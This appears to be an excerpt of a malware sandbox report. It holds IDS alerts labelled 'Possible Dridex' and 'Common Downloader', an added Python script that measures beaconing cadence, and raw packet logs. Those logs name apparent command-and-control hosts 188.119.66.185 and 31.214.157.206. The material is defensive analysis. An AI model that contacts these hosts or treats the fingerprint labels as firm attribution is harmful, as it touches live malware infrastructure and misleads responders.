2024-12-18T21:09:30.664229+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49748 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:32.225728+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49753 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:32.911095+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49753 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:34.496093+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49759 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:35.212252+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49759 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:36.805991+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49765 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:37.512182+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49765 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:39.297849+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49771 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:40.000817+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49771 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:41.570111+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49778 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:42.249515+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49778 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:43.826321+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49784 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:44.511936+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49784 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:46.121370+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49790 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:46.815980+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49790 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:48.410246+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49796 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:49.109158+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49796 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:50.869446+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49799 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:51.559680+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49799 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:53.153009+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49807 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:53.859056+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49807 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:55.624214+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49814 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:56.304733+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49814 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:57.893305+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49820 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:58.595378+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49820 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:00.351530+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49825 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:01.039673+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49825 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:02.934321+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49831 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:03.652200+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49831 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:05.249776+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:05.953618+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:07.733130+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49845 | 188.119.66.185 | 443 | TCP
2024-12-18T21:10:08.478248+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49845 | 188.119.66.185 | 443 | TCP
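Read as a sequence rather than as individual hits, the alert table shows one TLS connection to 188.119.66.185:443 every two to three seconds, each from a fresh source port, with the JA3 rule firing on the client hello and the downloader-header rule on the response. Two caveats for the responder: SID 2028765 matches a JA3 fingerprint, which classifies the TLS client stack rather than the malware family, so the "Possible Dridex" name is a label on the fingerprint, not an identification of this sample; and the value of the table is the cadence, which a single rule name cannot convey. The following is an added example, not Joe Sandbox or Suricata code: it groups alert rows by signature and destination and measures the gap between hits. SAMPLE_ALERTS is constructed from the first ten rows of the table above, one row per line with " | " between columns; the jitter threshold and the 75 percent rule are assumptions chosen for illustration.

```python
"""Group IDS alert rows by (signature, destination) and measure their cadence.
A fresh source port per hit and a near-constant gap between hits is the shape
of periodic beaconing.

Added example, not Joe Sandbox or Suricata code. SAMPLE_ALERTS is constructed
from the first ten rows of the report's IDS table; thresholds are assumptions.
"""
from datetime import datetime
from statistics import median

SAMPLE_ALERTS = """\
2024-12-18T21:09:00.658716+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49708 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:01.486334+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49708 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:06.384113+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49711 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:07.101198+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:08.727603+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49712 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:09.462001+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49712 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:11.182430+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49714 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:11.888662+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49714 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:13.655094+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49715 | 188.119.66.185 | 443 | TCP
2024-12-18T21:09:14.348609+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49715 | 188.119.66.185 | 443 | TCP
"""

COLUMNS = ("timestamp", "sid", "signature", "severity",
           "src_ip", "src_port", "dst_ip", "dst_port", "proto")


def parse_alerts(text):
    """Parse ' | '-separated alert rows into dicts with a timezone-aware datetime."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split(" | ")]
        if len(fields) != len(COLUMNS):
            raise ValueError(f"expected {len(COLUMNS)} columns: {line!r}")
        row = dict(zip(COLUMNS, fields))
        # %z accepts the +0100 offset form used in the report
        row["time"] = datetime.strptime(row.pop("timestamp"), "%Y-%m-%dT%H:%M:%S.%f%z")
        for key in ("sid", "severity", "src_port", "dst_port"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def summarize(rows, max_jitter_s=1.0, min_fraction=0.75):
    """Per (sid, dst_ip, dst_port): hit count, distinct source ports, median gap between
    hits, and whether at least min_fraction of the gaps lie within max_jitter_s of that
    median (the assumed definition of 'periodic' here)."""
    groups = {}
    for r in sorted(rows, key=lambda r: r["time"]):
        groups.setdefault((r["sid"], r["dst_ip"], r["dst_port"]), []).append(r)
    summary = {}
    for key, hits in groups.items():
        times = [h["time"] for h in hits]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps) if gaps else None
        steady = sum(abs(g - med) <= max_jitter_s for g in gaps) if gaps else 0
        summary[key] = {
            "signature": hits[0]["signature"],
            "count": len(hits),
            "distinct_src_ports": len({h["src_port"] for h in hits}),
            "median_gap_s": med,
            "periodic": bool(gaps) and steady >= min_fraction * len(gaps),
        }
    return summary


if __name__ == "__main__":
    for (sid, dst, port), s in summarize(parse_alerts(SAMPLE_ALERTS)).items():
        gap = "n/a" if s["median_gap_s"] is None else f"{s['median_gap_s']:.2f}s"
        print(f"sid {sid} -> {dst}:{port} hits={s['count']} "
              f"src_ports={s['distinct_src_ports']} median_gap={gap} "
              f"periodic={s['periodic']} {s['signature']}")
```

On the ten constructed rows both signatures come out with five hits from five distinct source ports and a median gap of roughly 2.4 seconds, with the only outlier being the longer first interval. The same grouping applied to the full table, or to Suricata's eve.json with the fields mapped onto COLUMNS, is a cheap way to separate a beaconing host from a one-off true or false positive.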
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 21:08:58.944464922 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:08:58.944533110 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:08:58.944710016 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:08:59.002722025 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:08:59.002763987 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:00.658649921 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:00.658715963 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:00.845097065 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:00.845158100 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:00.846152067 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:00.846231937 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:00.858563900 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:00.899363995 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:01.486447096 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:01.486593962 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:01.486625910 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:01.486666918 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:01.486778975 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:01.486778975 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:01.542398930 CET | 49708 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:01.542443991 CET | 443 | 49708 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:01.543565989 CET | 49710 | 2024 | 192.168.2.8 | 31.214.157.206
Dec 18, 2024 21:09:01.663471937 CET | 2024 | 49710 | 31.214.157.206 | 192.168.2.8
Dec 18, 2024 21:09:01.663546085 CET | 49710 | 2024 | 192.168.2.8 | 31.214.157.206
Dec 18, 2024 21:09:01.663671970 CET | 49710 | 2024 | 192.168.2.8 | 31.214.157.206
Dec 18, 2024 21:09:01.783071041 CET | 2024 | 49710 | 31.214.157.206 | 192.168.2.8
Dec 18, 2024 21:09:01.783123016 CET | 49710 | 2024 | 192.168.2.8 | 31.214.157.206
Dec 18, 2024 21:09:01.902862072 CET | 2024 | 49710 | 31.214.157.206 | 192.168.2.8
Dec 18, 2024 21:09:02.904292107 CET | 2024 | 49710 | 31.214.157.206 | 192.168.2.8
Dec 18, 2024 21:09:02.960208893 CET | 49710 | 2024 | 192.168.2.8 | 31.214.157.206
Dec 18, 2024 21:09:04.915242910 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:04.915282965 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:04.915364027 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:04.915662050 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:04.915678978 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:06.384016037 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:06.384113073 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:06.384790897 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:06.384812117 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:06.384972095 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:06.384978056 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:07.101195097 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:07.101274967 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:07.101350069 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:07.135396004 CET | 49711 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:07.135437012 CET | 443 | 49711 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:07.276730061 CET | 49712 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:07.276770115 CET | 443 | 49712 | 188.119.66.185 | 192.168.2.8
Dec 18, 2024 21:09:07.276829958 CET | 49712 | 443 | 192.168.2.8 | 188.119.66.185
Dec 18, 2024 21:09:07.277211905 CET | 49712 | 443 | 192.168.2.8 | 188.119.66.185
                                                                                          Dec 18, 2024 21:09:07.277223110 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:08.727493048 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:08.727602959 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:08.728022099 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:08.728030920 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:08.728235960 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:08.728240967 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462198019 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462354898 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462364912 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462388039 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.462414026 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462445974 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462718010 CET49712443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.462733030 CET44349712188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.463665009 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.583230972 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.583470106 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.583556890 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.583556890 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:09.700648069 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.700684071 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.700809956 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.701431036 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:09.701456070 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.703255892 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:09.749166965 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:10.556447029 CET20244971331.214.157.206192.168.2.8
                                                                                          Dec 18, 2024 21:09:10.556561947 CET497132024192.168.2.831.214.157.206
                                                                                          Dec 18, 2024 21:09:11.180046082 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.182430029 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.182858944 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.182868958 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.183105946 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.183110952 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.888695955 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.888778925 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:11.888823986 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.888885021 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.889350891 CET49714443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:11.889369965 CET44349714188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:12.009166002 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:12.009213924 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:12.009361982 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:12.009845972 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:12.009864092 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:13.654992104 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:13.655093908 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:13.655545950 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:13.655556917 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:13.655714035 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:13.655719995 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.348725080 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.348901033 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.349057913 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.349265099 CET49715443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.349282980 CET44349715188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.477689028 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.477735043 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:14.477966070 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.478197098 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:14.478219032 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:15.958192110 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:15.958266020 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:15.961941957 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:15.961951017 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:15.962127924 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:15.962145090 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.668905020 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.668967009 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.668987989 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.669022083 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669028044 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.669059038 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.669059992 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669096947 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669347048 CET49716443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.669362068 CET44349716188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.791330099 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.791363001 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:16.791428089 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.792073965 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:16.792087078 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:18.459223032 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:18.459471941 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:18.460066080 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:18.460074902 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:18.460443974 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:18.460449934 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.162508965 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.162635088 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.162643909 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.162682056 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.163424969 CET49718443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.163444042 CET44349718188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.290716887 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.290756941 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:19.290838957 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.291215897 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:19.291237116 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:20.767446041 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:20.767558098 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:20.768038988 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:20.768050909 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:20.768233061 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:20.768238068 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.528378963 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.528460979 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.528462887 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.528510094 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.528656006 CET49724443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.528675079 CET44349724188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.634684086 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.634737015 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:21.634849072 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.635196924 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:21.635210991 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.091150999 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.091279984 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.091844082 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.091861963 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.092025042 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.092030048 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.773807049 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.773964882 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.773998976 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.774024963 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.774059057 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.774070978 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.774168015 CET49730443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.774183989 CET44349730188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.901572943 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.901621103 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:23.901684046 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.902048111 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:23.902060986 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:25.363203049 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:25.363359928 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:25.363919973 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:25.363953114 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:25.364098072 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:25.364111900 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:26.062345028 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:26.062429905 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:26.062454939 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:26.062520027 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:26.062774897 CET49736443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:26.062817097 CET44349736188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:26.181556940 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:26.181602955 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:26.181720018 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:26.182183027 CET49742443192.168.2.8188.119.66.185
